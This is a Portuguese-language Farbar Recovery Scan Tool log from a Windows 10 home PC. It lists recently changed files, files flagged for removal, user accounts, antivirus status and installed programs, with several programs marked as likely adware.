2017-01-10 17:35 - 2016-12-14 01:45 - 00147968 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\win32k.sys
2017-01-10 17:35 - 2016-12-14 01:40 - 00104448 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Internal.UI.Logon.ProxyStub.dll
2017-01-10 17:33 - 2016-12-14 02:08 - 00341344 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msv1_0.dll
2017-01-10 17:33 - 2016-12-14 01:40 - 00266752 _____ (Microsoft Corporation) C:\WINDOWS\system32\ConsoleLogon.dll
2017-01-10 17:33 - 2016-12-14 01:32 - 00806400 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\D3D12.dll
2017-01-10 17:32 - 2016-12-21 04:13 - 00119808 _____ (Microsoft Corporation) C:\WINDOWS\system32\KnobsCsp.dll
2017-01-10 17:32 - 2016-12-21 04:10 - 00234496 _____ (Microsoft Corporation) C:\WINDOWS\system32\KnobsCore.dll
2017-01-10 17:32 - 2016-12-21 04:08 - 00349184 _____ (Microsoft Corporation) C:\WINDOWS\system32\provengine.dll
2017-01-10 17:32 - 2016-12-21 01:24 - 05061120 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\d2d1.dll
2017-01-09 10:31 - 2017-01-09 10:34 - 03076045 _____ C:\Users\Helder\Downloads\tagscan-6.0.18.zip
2016-12-27 10:35 - 2016-11-11 14:41 - 00047176 _____ (GAS Tecnologia) C:\WINDOWS\system32\Drivers\wsddntf.sys
2016-12-27 10:35 - 2016-11-11 14:41 - 00025184 ____N (GAS Tecnologia) C:\WINDOWS\system32\Drivers\wsddprm.sys
2016-12-27 10:35 - 2016-11-11 14:41 - 00010345 _____ C:\WINDOWS\system32\Drivers\wsddntf.cat
2016-12-27 10:35 - 2016-11-11 14:41 - 00002708 _____ C:\WINDOWS\system32\Drivers\wsddntf.inf
2016-12-26 17:46 - 2016-12-26 17:46 - 00188309 _____ C:\Users\Helder\Downloads\Westworld.S01E01.04102016.rar
2016-12-25 22:55 - 2016-12-25 22:55 - 00150446 _____ C:\Users\Helder\Downloads\Westworld.S01E08-up2.zip
==================== Três Meses Modificados arquivos e pastas ========
(Se uma entrada for incluída na fixlist, o arquivo/pasta será movido.)
2017-03-22 19:47 - 2015-05-20 23:42 - 00000000 __SHD C:\Users\Helder\IntelGraphicsProfiles
2017-03-22 19:47 - 2014-12-31 13:19 - 00000000 ____D C:\Users\Todos os Usuários\GbPlugin
2017-03-22 19:47 - 2014-12-31 13:19 - 00000000 ____D C:\ProgramData\GbPlugin
2017-03-22 11:40 - 2016-08-03 00:56 - 00000000 ____D C:\WINDOWS\system32\SleepStudy
2017-03-22 11:38 - 2014-10-29 11:40 - 00002320 _____ C:\Users\Helder\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Search.lnk
2017-03-22 11:38 - 2014-03-31 17:38 - 00001836 _____ C:\Users\Helder\Desktop\chrome - Atalho.lnk
2017-03-22 11:31 - 2015-11-19 18:52 - 00029816 _____ (GAS Tecnologia) C:\WINDOWS\system32\Drivers\gbpddreg64.sys
2017-03-22 11:31 - 2015-08-26 19:19 - 00028888 _____ (GAS Tecnologia) C:\WINDOWS\system32\Drivers\gbpddfac64.sys
2017-03-22 11:30 - 2016-08-03 01:37 - 00000006 ____H C:\WINDOWS\Tasks\SA.DAT
2017-03-22 11:30 - 2015-11-19 18:59 - 00028376 _____ (GAS Tecnologia) C:\WINDOWS\system32\Drivers\wsddfac.sys
2017-03-22 11:30 - 2014-12-31 13:19 - 00000000 ____D C:\Program Files (x86)\GbPlugin
2017-03-22 11:29 - 2016-07-16 03:04 - 01310720 _____ C:\WINDOWS\system32\config\BBI
2017-03-21 19:55 - 2016-07-16 08:47 - 00000000 ____D C:\WINDOWS\rescache
2017-03-21 14:09 - 2016-10-25 15:29 - 00000000 ____D C:\Program Files\Office 2016 KMS Activator Ultimate v1.1 Final
2017-03-21 14:07 - 2016-02-26 18:14 - 00001540 _____ C:\Users\Public\Desktop\Mozilla Firefox.lnk
2017-03-21 14:06 - 2015-07-06 12:52 - 00001852 _____ C:\Users\Helder\Desktop\firefox.exe - Atalho.lnk
2017-03-21 14:06 - 2015-04-25 02:11 - 00001552 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Mozilla Firefox.lnk
2017-03-21 13:50 - 2016-07-16 08:47 - 00000000 ____D C:\WINDOWS\AppReadiness
2017-03-20 16:24 - 2016-06-22 13:21 - 00000022 _____ C:\Users\Helder\Downloads\OriginPro_2016_Full_Crack (1).zip
2017-03-20 16:24 - 2016-06-22 13:18 - 00000022 _____ C:\Users\Helder\Downloads\OriginPro_2016_Full_Crack.zip
2017-03-20 12:51 - 2014-05-12 16:58 - 00192216 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\MBAMSwissArmy.sys
2017-03-20 12:20 - 2016-07-16 20:04 - 00481382 _____ C:\WINDOWS\system32\prfh0416.dat
2017-03-20 12:20 - 2016-07-16 20:04 - 00146318 _____ C:\WINDOWS\system32\prfc0416.dat
2017-03-20 12:20 - 2015-08-02 00:19 - 01693938 _____ C:\WINDOWS\system32\PerfStringBackup.INI
2017-03-20 12:20 - 2014-03-26 13:46 - 00000000 __RHD C:\Users\Public\AccountPictures
2017-03-20 12:16 - 2016-07-16 08:47 - 00000000 ____D C:\WINDOWS\system32\NDF
2017-03-20 11:20 - 2016-07-16 08:47 - 00000000 ___HD C:\Program Files\WindowsApps
2017-03-20 11:18 - 2014-03-26 13:49 - 00000000 ____D C:\Users\Helder\AppData\Local\Packages
2017-03-20 10:57 - 2014-03-26 14:06 - 00000000 ____D C:\Users\Helder\AppData\Local\Microsoft Help
2017-03-20 10:46 - 2016-07-16 08:47 - 00000000 ____D C:\WINDOWS\system32\appraiser
2017-03-20 10:46 - 2016-07-16 08:36 - 00000000 ____D C:\WINDOWS\CbsTemp
2017-03-20 10:40 - 2016-08-03 01:04 - 00000000 ____D C:\Users\Helder
2017-03-20 10:20 - 2016-07-16 08:47 - 00000000 ____D C:\Users\Todos os Usuários\regid.1991-06.com.microsoft
2017-03-20 10:20 - 2016-07-16 08:47 - 00000000 ____D C:\ProgramData\regid.1991-06.com.microsoft
2017-03-19 11:33 - 2016-08-03 01:37 - 00003126 _____ C:\WINDOWS\System32\Tasks\McAfeeLogon
2017-03-19 11:33 - 2016-08-03 01:37 - 00000000 ____D C:\WINDOWS\System32\Tasks\McAfee
2017-03-18 23:36 - 2014-07-05 15:27 - 00000000 __RDO C:\Users\Helder\OneDrive
2017-03-18 08:23 - 2016-07-16 03:04 - 00032768 _____ C:\WINDOWS\system32\config\ELAM
2017-03-14 17:30 - 2016-07-16 08:45 - 00000000 ____D C:\WINDOWS\INF
2017-03-14 17:28 - 2016-08-03 00:56 - 00496840 _____ C:\WINDOWS\system32\FNTCACHE.DAT
2017-03-14 17:28 - 2015-03-16 10:41 - 00000000 ____D C:\Program Files\Microsoft Silverlight
2017-03-14 17:28 - 2015-03-16 10:41 - 00000000 ____D C:\Program Files (x86)\Microsoft Silverlight
2017-03-14 16:54 - 2016-07-16 08:47 - 00000000 ___SD C:\WINDOWS\SysWOW64\F12
2017-03-14 16:54 - 2016-07-16 08:47 - 00000000 ____D C:\WINDOWS\SysWOW64\setup
2017-03-14 16:52 - 2016-07-16 08:47 - 00000000 ___SD C:\WINDOWS\system32\F12
2017-03-14 16:52 - 2016-07-16 08:47 - 00000000 ____D C:\WINDOWS\system32\setup
2017-03-14 16:52 - 2016-07-16 08:47 - 00000000 ____D C:\WINDOWS\system32\oobe
2017-03-14 16:51 - 2016-07-16 08:47 - 00000000 ___RD C:\WINDOWS\PrintDialog
2017-03-14 16:51 - 2016-07-16 08:47 - 00000000 ___RD C:\WINDOWS\ImmersiveControlPanel
2017-03-14 16:51 - 2016-07-16 08:47 - 00000000 ____D C:\WINDOWS\ShellExperiences
2017-03-14 16:51 - 2016-07-16 08:47 - 00000000 ____D C:\WINDOWS\bcastdvr
2017-03-14 16:50 - 2016-07-16 08:47 - 00000000 ___RD C:\Program Files\Windows Defender
2017-03-14 16:50 - 2016-07-16 08:47 - 00000000 ____D C:\Program Files\Windows Photo Viewer
2017-03-14 16:50 - 2016-07-16 08:47 - 00000000 ____D C:\Program Files (x86)\Windows Photo Viewer
2017-03-14 16:50 - 2016-07-16 08:47 - 00000000 ____D C:\Program Files (x86)\Windows Defender
2017-03-14 16:23 - 2014-03-26 15:20 - 00000000 ____D C:\WINDOWS\system32\MRT
2017-03-14 16:16 - 2014-03-26 15:20 - 138634176 ____C (Microsoft Corporation) C:\WINDOWS\system32\MRT.exe
2017-03-14 16:02 - 2015-05-17 19:30 - 00000000 ____D C:\Users\Helder\AppData\Roaming\vlc
2017-03-14 15:55 - 2015-03-16 10:41 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Silverlight
2017-03-14 09:47 - 2016-08-03 01:37 - 00004458 _____ C:\WINDOWS\System32\Tasks\Adobe Flash Player Updater
2017-03-14 09:47 - 2016-07-16 08:47 - 00000000 ____D C:\WINDOWS\SysWOW64\Macromed
2017-03-14 09:47 - 2016-07-16 08:47 - 00000000 ____D C:\WINDOWS\system32\Macromed
2017-03-11 20:07 - 2016-07-16 08:47 - 00000000 ____D C:\WINDOWS\LiveKernelReports
2017-03-11 16:42 - 2015-08-11 14:18 - 00000000 ____D C:\Users\Helder\AppData\Roaming\Kodi
2017-03-10 10:50 - 2014-03-30 20:25 - 00000000 ____D C:\Users\Helder\AppData\Roaming\BitTorrent
2017-03-10 02:17 - 2016-07-16 08:49 - 00835576 _____ (Adobe Systems Incorporated) C:\WINDOWS\SysWOW64\FlashPlayerApp.exe
2017-03-10 02:17 - 2016-07-16 08:49 - 00177656 _____ (Adobe Systems Incorporated) C:\WINDOWS\SysWOW64\FlashPlayerCPLApp.cpl
2017-03-04 22:08 - 2014-10-17 00:47 - 00000000 ___RD C:\Users\Helder\Google Drive
2017-03-04 04:09 - 2016-08-03 00:59 - 02717184 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\PrintConfig.dll
2017-03-02 22:53 - 2015-08-02 00:41 - 00000000 ____D C:\Users\Helder\AppData\Local\Comms
2017-03-02 15:03 - 2015-10-21 10:56 - 00000000 ____D C:\Program Files\Recuva
2017-03-02 13:10 - 2016-12-19 13:04 - 00003274 _____ C:\WINDOWS\System32\Tasks\OneDrive Standalone Update Task v2
2017-03-02 13:10 - 2015-08-02 00:51 - 00002416 _____ C:\Users\Helder\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\OneDrive.lnk
2017-02-22 21:05 - 2015-10-30 15:55 - 00002457 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Acrobat Reader DC.lnk
2017-02-20 21:45 - 2016-07-04 19:04 - 00000000 ____D C:\Users\Helder\AppData\Local\PackageStaging
==================== Arquivos na raiz de alguns diretórios =======
2014-03-31 18:17 - 2014-03-31 18:17 - 0000041 _____ () C:\Users\Helder\AppData\Roaming\WB.CFG
2015-04-16 17:12 - 2015-04-22 17:43 - 0001153 _____ () C:\Users\Helder\AppData\Local\OfficeMix.txt
2016-01-22 13:10 - 2016-01-22 13:10 - 0000000 _____ () C:\Users\Helder\AppData\Local\{C9183072-AE9C-418F-B127-EBE6F3D8CEDB}
2014-12-15 01:12 - 2014-12-15 01:12 - 0000227 _____ () C:\ProgramData\bc.ini
2016-08-03 00:58 - 2016-08-03 00:58 - 0000000 ____H () C:\ProgramData\DP45977C.lfl
2014-10-29 12:39 - 2014-10-29 12:39 - 0014304 _____ () C:\ProgramData\Duplicaterecord.js
2014-01-15 02:15 - 2014-01-15 02:15 - 0167784 _____ (Baidu, Inc.) C:\ProgramData\FileSplitUpLoad.dll
2016-05-06 15:19 - 2016-05-06 15:42 - 0000358 _____ () C:\ProgramData\hpzinstall.log
2015-08-02 20:34 - 2015-08-02 20:34 - 0000032 _____ () C:\ProgramData\Temp.log
2014-01-25 03:08 - 2014-01-25 03:08 - 0000119 _____ () C:\ProgramData\{1FBF6C24-C1fD-4101-A42B-0C564F9E8E79}.log
2014-01-25 03:02 - 2014-01-25 03:04 - 0000106 _____ () C:\ProgramData\{2A87D48D-3FDF-41fd-97CD-A1E370EFFFE2}.log
2014-01-25 03:04 - 2014-01-25 03:06 - 0000111 _____ () C:\ProgramData\{B0B4F6D2-F2AE-451A-9496-6F2F6A897B32}.log
2014-01-25 03:02 - 2014-01-25 03:02 - 0000107 _____ () C:\ProgramData\{C59C179C-668D-49A9-B6EA-0121CCFC1243}.log
2014-01-25 03:06 - 2014-01-25 03:08 - 0000108 _____ () C:\ProgramData\{DEC235ED-58A4-4517-A278-C41E8DAEAB3B}.log
Arquivos para serem movidos ou deletados:
====================
C:\ProgramData\Duplicaterecord.js
C:\ProgramData\FileSplitUpLoad.dll
C:\Users\Todos os Usuários\Duplicaterecord.js
C:\Users\Todos os Usuários\FileSplitUpLoad.dll

Alguns arquivos em TEMP:
====================
2016-10-19 15:30 - 2016-10-19 15:30 - 0737856 _____ (Oracle Corporation) C:\Users\Helder\AppData\Local\Temp\jre-8u111-windows-au.exe
2017-01-23 09:47 - 2017-01-23 09:47 - 0739904 _____ (Oracle Corporation) C:\Users\Helder\AppData\Local\Temp\jre-8u121-windows-au.exe
==================== Bamital & volsnap ======================
(Não há correção automática para arquivos que não passaram na verificação.)
C:\WINDOWS\system32\winlogon.exe => O arquivo é assinado digitalmente
C:\WINDOWS\system32\wininit.exe => O arquivo é assinado digitalmente
C:\WINDOWS\explorer.exe => O arquivo é assinado digitalmente
C:\WINDOWS\SysWOW64\explorer.exe => O arquivo é assinado digitalmente
C:\WINDOWS\system32\svchost.exe => O arquivo é assinado digitalmente
C:\WINDOWS\SysWOW64\svchost.exe => O arquivo é assinado digitalmente
C:\WINDOWS\system32\services.exe => O arquivo é assinado digitalmente
C:\WINDOWS\system32\User32.dll => O arquivo é assinado digitalmente
C:\WINDOWS\SysWOW64\User32.dll => O arquivo é assinado digitalmente
C:\WINDOWS\system32\userinit.exe => O arquivo é assinado digitalmente
C:\WINDOWS\SysWOW64\userinit.exe => O arquivo é assinado digitalmente
C:\WINDOWS\system32\rpcss.dll => O arquivo é assinado digitalmente
C:\WINDOWS\system32\dnsapi.dll => O arquivo é assinado digitalmente
C:\WINDOWS\SysWOW64\dnsapi.dll => O arquivo é assinado digitalmente
C:\WINDOWS\system32\Drivers\volsnap.sys => O arquivo é assinado digitalmente
LastRegBack: 2017-03-21 12:19
==================== Fim de FRST.txt ============================

Resultado do exame Adicional Farbar Recovery Scan Tool (x64) Versão: 15-03-2017
Executado por Helder (22-03-2017 20:02:31)
Executando a partir de C:\Users\Helder\Desktop
Windows 10 Home Single Language Versão 1607 (X64) (2016-08-03 05:09:02)
Modo da Inicialização: Normal
==========================================================

==================== Contas: =============================
Administrador (S-1-5-21-2306744415-2254712149-2456193828-500 - Administrator - Disabled)
Convidado (S-1-5-21-2306744415-2254712149-2456193828-501 - Limited - Disabled)
DefaultAccount (S-1-5-21-2306744415-2254712149-2456193828-503 - Limited - Disabled)
Helder (S-1-5-21-2306744415-2254712149-2456193828-1001 - Administrator - Enabled) => C:\Users\Helder
HomeGroupUser$ (S-1-5-21-2306744415-2254712149-2456193828-1005 - Limited - Enabled)
==================== Central de Segurança ========================
(Se uma entrada for incluída na fixlist, será removida.)
AV: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AV: Antivírus e antispyware da McAfee (Enabled - Up to date) {8BCDACFA-D264-3528-5EF8-E94FD0BC1FBC}
AS: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AS: Antivírus e antispyware da McAfee (Enabled - Up to date) {30AC4D1E-F45E-3AA6-6448-D23DAB3B5501}
==================== Programas Instalados ======================
(Somente os programas adwares com a indicação "Oculto" podem ser adicionados à fixlist para desocultá-los. Os programas adwares devem ser desinstalados manualmente.)
7-Zip 9.20 (x64 edition) (HKLM\...\{23170F69-40C1-2702-0920-000001000000}) (Version: 9.20.00.0 - Igor Pavlov)
Adobe Acrobat Reader DC (HKLM-x32\...\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}) (Version: 15.023.20070 - Adobe Systems Incorporated)
Adobe Flash Player 25 NPAPI (HKLM-x32\...\Adobe Flash Player NPAPI) (Version: 25.0.0.127 - Adobe Systems Incorporated)
amulesw (HKLM-x32\...\{13D7C2E9-08E7-4889-94FF-87E707184E53}) (Version: 1.0.7 - amules) <==== ATENÇÃO
ArcGIS 10.2 Data Interoperability for Desktop (HKLM-x32\...\ArcGIS 10.2 Data Interoperability for Desktop) (Version: 10.2.3348 - Environmental Systems Research Institute, Inc.)
ArcGIS 10.2 Data Interoperability for Desktop (x32 Version: 10.2.3348 - Environmental Systems Research Institute, Inc.) Hidden
ArcGIS 10.2 for Desktop (HKLM-x32\...\ArcGIS 10.2 for Desktop) (Version: 10.2.3348 - Environmental Systems Research Institute, Inc.)
ArcGIS 10.2 for Desktop (x32 Version: 10.2.3348 - Environmental Systems Research Institute, Inc.) Hidden
ArcGIS 10.2 for Desktop Background Geoprocessing (64-bit) (HKLM\...\ArcGIS 10.2 for Desktop Background Geoprocessing (64-bit)) (Version: 10.2.3348 - Environmental Systems Research Institute, Inc.)
ArcGIS 10.2 for Desktop Background Geoprocessing (64-bit) (Version: 10.2.3348 - Environmental Systems Research Institute, Inc.) Hidden
ArcGIS 10.2.1 License Manager (HKLM-x32\...\ArcGIS 10.2.1 License Manager) (Version: 10.2.3497 - Environmental Systems Research Institute, Inc.)
ArcGIS 10.2.1 License Manager (x32 Version: 10.2.3497 - Environmental Systems Research Institute, Inc.) Hidden
Ashampoo Burning Studio 14 (HKLM-x32\...\{91B33C97-7BCF-CDFE-4321-58EBF3E8641C}_is1) (Version: 14.0.5 - Ashampoo GmbH & Co. KG)
Assistente de Atualização do Windows 10 (HKLM-x32\...\{D5C69738-B486-402E-85AC-2456D98A64E4}) (Version: 1.4.9200.17346 - Microsoft Corporation)
aTube Catcher (HKLM-x32\...\aTube Catcher) (Version: 3.8.7955 - DsNET Corp)
Auslogics Registry Cleaner (HKLM-x32\...\{8D8024F1-2945-49A5-9B78-5AB7B11D7942}_is1) (Version: 4.0.0.0 - Auslogics Labs Pty Ltd)
BikaQ Rss (HKLM-x32\...\{3678D164-84DB-4F73-AFD6-916342E10764}) (Version: 3.0.17 - BikaQ) <==== ATENÇÃO
BitTorrent (HKU\S-1-5-21-2306744415-2254712149-2456193828-1001\...\BitTorrent) (Version: 7.9.9.43296 - BitTorrent Inc.)
BufferChm (x32 Version: 130.0.327.000 - Hewlett-Packard) Hidden
Caesium versão 1.7.0 (HKLM-x32\...\{88B0F0DE-6937-440D-B5CA-6E69003E55F7}_is1) (Version: 1.7.0 - Matteo Paonessa)
Corel Graphics - Windows Shell Extension (HKLM\...\_{3CAAE169-6001-48ED-B2C6-5B6F511552FD}) (Version: 18.0.0.448 - Corel Corporation)
Corel Graphics - Windows Shell Extension (Version: 18.0.448 - Corel Corporation) Hidden
Corel Graphics - Windows Shell Extension 32 Bit Keys (Version: 18.0.448 - Corel Corporation) Hidden
CorelDRAW Graphics Suite X7 - FontNav (x64) (Version: 17.5 - Corel Corporation) Hidden
CorelDRAW Graphics Suite X7 - IPM Content (x64) (Version: 17.0 - Corel Corporation) Hidden
CorelDRAW Graphics Suite X7 - Setup Files (x64) (Version: 17.5 - Corel Corporation) Hidden
CorelDRAW Graphics Suite X7 - VBA (x64) (Version: 17.5 - Corel Corporation) Hidden
CorelDRAW Graphics Suite X7 - Writing Tools (x64) (Version: 17.5 - Corel Corporation) Hidden
CorelDRAW Graphics Suite X8 - BR (x64) (Version: 18.0 - Corel Corporation) Hidden
CorelDRAW Graphics Suite X8 - Capture (x64) (Version: 18.0 - Corel Corporation) Hidden
CorelDRAW Graphics Suite X8 - Common (x64) (Version: 18.0 - Corel Corporation) Hidden
CorelDRAW Graphics Suite X8 - Connect (x64) (Version: 18.0 - Corel Corporation) Hidden
CorelDRAW Graphics Suite X8 - Custom Data (x64) (Version: 18.0 - Corel Corporation) Hidden
CorelDRAW Graphics Suite X8 - Draw (x64) (Version: 18.0 - Corel Corporation) Hidden
CorelDRAW Graphics Suite X8 - Filters (x64) (Version: 18.0 - Corel Corporation) Hidden
CorelDRAW Graphics Suite X8 - Font Manager (x64) (Version: 18.0 - Corel Corporation) Hidden
CorelDRAW Graphics Suite X8 - IPM Content (x64) (Version: 18.0 - Corel Corporation) Hidden
CorelDRAW Graphics Suite X8 - IPM T (x64) (Version: 18.0 - Corel Corporation) Hidden
CorelDRAW Graphics Suite X8 - PHOTO-PAINT (x64) (Version: 18.0 - Corel Corporation) Hidden
CorelDRAW Graphics Suite X8 - Redist (x64) (Version: 18.0 - Corel Corporation) Hidden
CorelDRAW Graphics Suite X8 - Setup Files (x64) (Version: 18.0 - Corel Corporation) Hidden
CorelDRAW Graphics Suite X8 - VBA (x64) (Version: 18.0 - Corel Corporation) Hidden
CorelDRAW Graphics Suite X8 - VideoBrowser (x64) (Version: 18.0 - Corel Corporation) Hidden
CorelDRAW Graphics Suite X8 - Workspaces (x64) (Version: 18.0 - Corel Corporation) Hidden
CorelDRAW Graphics Suite X8 - Writing Tools (x64) (Version: 18.0 - Corel Corporation) Hidden
CorelDRAW Graphics Suite X8 (64-Bit) (HKLM\...\_{4B3FC55D-E999-4BEC-AF29-1091E574961F}) (Version: 18.0.0.448 - Corel Corporation)
CorelDRAW Graphics Suite X8 (Version: 18.0 - Corel Corporation) Hidden
D3DX10 (x32 Version: 15.4.2368.0902 - Microsoft) Hidden
DAEMON Tools Lite (HKLM\...\DAEMON Tools Lite) (Version: 10.1.0.0074 - Disc Soft Ltd)
Dell Backup and Recovery - Support Software (HKLM-x32\...\{A9668246-FB70-4103-A1E3-66C9BC2EFB49}) (Version: 1.7.1.2 - Dell Inc.)
Dell Backup and Recovery (HKLM-x32\...\{0ED7EE95-6A97-47AA-AD73-152C08A15B04}) (Version: 1.7.1.2 - Dell Inc.)
Dell Customer Connect (HKLM-x32\...\{FEFDCDCF-C49C-45D0-AAF8-5345858ADEC7}) (Version: 1.2.1.0 - Dell Inc.)
Dell Data Vault (Version: 4.2.2.0 - Dell Inc.) Hidden
Dell Digital Delivery (HKLM-x32\...\{D850CB7E-72BC-4510-BA4F-48932BFAB295}) (Version: 2.9.901.0 - Dell Products, LP)
Dell SupportAssistAgent (HKLM-x32\...\{287348C8-8B47-4C36-AF28-441A3B7D8722}) (Version: 1.0.3.60494 - Dell)
Dell System Detect (HKU\S-1-5-21-2306744415-2254712149-2456193828-1001\...\73f463568823ebbe) (Version: 6.4.0.7 - Dell)
Dell Touchpad (HKLM\...\SynTPDeinstKey) (Version: 19.0.15.2 - Synaptics Incorporated)
Dell Update (HKLM-x32\...\{90437913-9D4D-4D9D-B438-B8664DF851E9}) (Version: 1.7.1007.0 - Dell Inc.)
Dell WLAN and Bluetooth Client Installation (HKLM-x32\...\{28006915-2739-4EBE-B5E8-49B25D32EB33}) (Version: 10.0 - Dell Inc.)
deskapp (HKLM-x32\...\{C5098A80-A438-42E1-ADC3-874262D1EAF3}) (Version: 1.1.0 - deskapp)
Destinations (x32 Version: 130.0.0.0 - Hewlett-Packard) Hidden
Diagnóstico BB (HKLM-x32\...\Diagnóstico BB_is1) (Version: - Banco do Brasil)
DocProc (x32 Version: 13.0.0.0 - Hewlett-Packard) Hidden
EndNote X7 (HKLM-x32\...\{86B3F2D6-AC2B-0017-8AE1-F2F77F781B0C}) (Version: 17.5.0.9325 - Thomson Reuters)
Facebook Video Calling 2.0.0.447 (HKLM-x32\...\{8DF41A9F-FE13-43E8-A003-5F9B55A011EE}) (Version: 2.0.447 - Skype Limited)
FastStone Photo Resizer 3.2 (HKLM-x32\...\FastStone Photo Resizer) (Version: 3.2 - FastStone Soft.)
Galeria de Fotos (x32 Version: 16.4.3505.0912 - Microsoft Corporation) Hidden
Ghostscript GPL 8.64 (Msi Setup) (HKLM-x32\...\_{06CD45E6-FF5E-4D8E-BC01-B276A90DADF2}) (Version: 8.64 - Corel Corporation)
Ghostscript GPL 8.64 (Msi Setup) (x32 Version: 8.64 - Corel Corporation) Hidden
Global Mapper 13 (64-bit) (HKLM\...\{CB815A97-4F15-4FDB-B848-55DA9C9F5ADF}) (Version: 13.00.0010 - Blue Marble Geographics)
Google Chrome (HKLM-x32\...\Google Chrome) (Version: 56.0.2924.87 - Google Inc.)
Google Drive (HKLM-x32\...\{07A12123-B717-496B-B471-48AF6407B433}) (Version: 1.32.4066.7445 - Google, Inc.)
Google Earth (HKLM-x32\...\{F6430171-B86B-4639-839E-374913E7911D}) (Version: 7.1.8.3036 - Google)
Google Update Helper (x32 Version: 1.3.25.11 - Google Inc.) Hidden
Google Update Helper (x32 Version: 1.3.32.7 - Google Inc.) Hidden
GPBaseService2 (x32 Version: 130.0.367.000 - Hewlett-Packard) Hidden
GTK2-Runtime (HKLM-x32\...\GTK2-Runtime) (Version: 2.16.6-2010-02-24-ash - Alexander Shaduri)
HP Imaging Device Functions 13.0 (HKLM\...\HP Imaging Device Functions) (Version: 13.0 - HP)
HP Photosmart Essential 3.5 (HKLM\...\HP Photosmart Essential) (Version: 3.5 - HP)
HP Scanjet 2400 (HKLM\...\{D3A65B0A-403B-4C20-A488-BFED2BC5D2EF}) (Version: 13.0 - HP)
HP Solution Center 13.0 (HKLM\...\HP Solution Center & Imaging Support Tools) (Version: 13.0 - HP)
HP Update (HKLM-x32\...\{7059BDA7-E1DB-442C-B7A1-6144596720A4}) (Version: 4.000.011.006 - Hewlett-Packard)
hpg2410 (x32 Version: 14.0.0.0 - Nome de sua empresa Hidden
HPPhotosmartEssential (x32 Version: 2.04.0000 - Hewlett-Packard) Hidden
HPProductAssistant (x32 Version: 130.0.367.000 - Hewlett-Packard) Hidden
Icecream PDF Split and Merge versão 2.13 (HKLM-x32\...\{95DC4DB4-99FB-4FB2-ADBD-97F194EDEB4D}_is1) (Version: 2.13 - Icecream Apps)
Intel(R) C++ Redistributables for Windows* on Intel(R) 64 (HKLM-x32\...\{D2437C5C-2D8C-40D2-8059-689AD7239FA3}) (Version: 11.1.048 - Intel Corporation)
Intel(R) Control Center (HKLM-x32\...\{F8A9085D-4C7A-41a9-8A77-C8998A96C421}) (Version: 1.2.1.1008 - Intel Corporation)
Intel(R) Management Engine Components (HKLM-x32\...\{65153EA5-8B6E-43B6-857B-C6E4FC25798A}) (Version: 8.1.0.1252 - Intel Corporation)
Intel(R) Processor Graphics (HKLM-x32\...\{F0E3AD40-2BBD-4360-9C76-B9AC9A5886EA}) (Version: 10.18.10.4276 - Intel Corporation)
Intel(R) Rapid Storage Technology (HKLM-x32\...\{3E29EE6C-963A-4aae-86C1-DC237C4A49FC}) (Version: 11.5.0.1207 - Intel Corporation)
IPM_Installer (Version: 2.1 - Your Company Name) Hidden
Java 8 Update 121 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F32180121F0}) (Version: 8.0.1210.13 - Oracle Corporation)
Jogotempo version 5.0 (HKLM-x32\...\{B552B283-6EBC-457E-8187-01682C83F26C}_is1) (Version: 5.0 - ) <==== ATENÇÃO
KMSpico (HKLM\...\{8B29D47F-92E2-4C20-9EE0-F710991F5D7C}_is1) (Version: - )
Kodi (HKU\S-1-5-21-2306744415-2254712149-2456193828-1001\...\Kodi) (Version: - XBMC-Foundation)
Legendas 3.5 (HKLM-x32\...\{461C0377-D2EC-4FB0-B038-847BC6455432}_is1) (Version: 3.5 - LegendasBrasil.org)
Lingoes 2.9.2 (HKLM\...\Lingoes Translator (x64)_is1) (Version: 2.9.2 - Lingoes Project)
Malwarebytes Anti-Malware versão 2.2.1.1043 (HKLM-x32\...\Malwarebytes Anti-Malware_is1) (Version: 2.2.1.1043 - Malwarebytes)
McAfee AntiVirus (HKLM-x32\...\MSC) (Version: 14.0.3061 - McAfee, Inc.)
McAfee Security Scan Plus (HKLM\...\McAfee Security Scan) (Version: 3.11.500.3 - McAfee, Inc.)
McAfee WebAdvisor (HKLM-x32\...\{35ED3F83-4BDC-4c44-8EC6-6A8301C7413A}) (Version: 4.0.235 - McAfee, Inc.)
Metric Collection SDK 35 (x32 Version: 1.2.0010.00 - Lenovo Group Limited) Hidden
Microsoft Office Professional Plus 2016 - pt-br (HKLM\...\ProPlusRetail - pt-br) (Version: 16.0.4266.1003 - Microsoft Corporation)
Microsoft OneDrive (HKU\S-1-5-21-2306744415-2254712149-2456193828-1001\...\OneDriveSetup.exe) (Version: 17.3.6798.0207 - Microsoft Corporation)
Microsoft Silverlight (HKLM\...\{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}) (Version: 5.1.50905.0 - Microsoft Corporation)
Microsoft SQL Server 2005 Compact Edition [ENU] (HKLM-x32\...\{F0B430D1-B6AA-473D-9B06-AA3DD01FD0B8}) (Version: 3.1.0000 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{837b34e3-7c30-493c-8f6a-2b0f04e2912c}) (Version: 8.0.59193 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{A49F249F-0C91-497F-86DF-B2585E8E76B7}) (Version: 8.0.50727.42 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17 (HKLM\...\{8220EEFE-38CD-377E-8595-13398D740ACE}) (Version: 9.0.30729 - Microsoft Corporation)
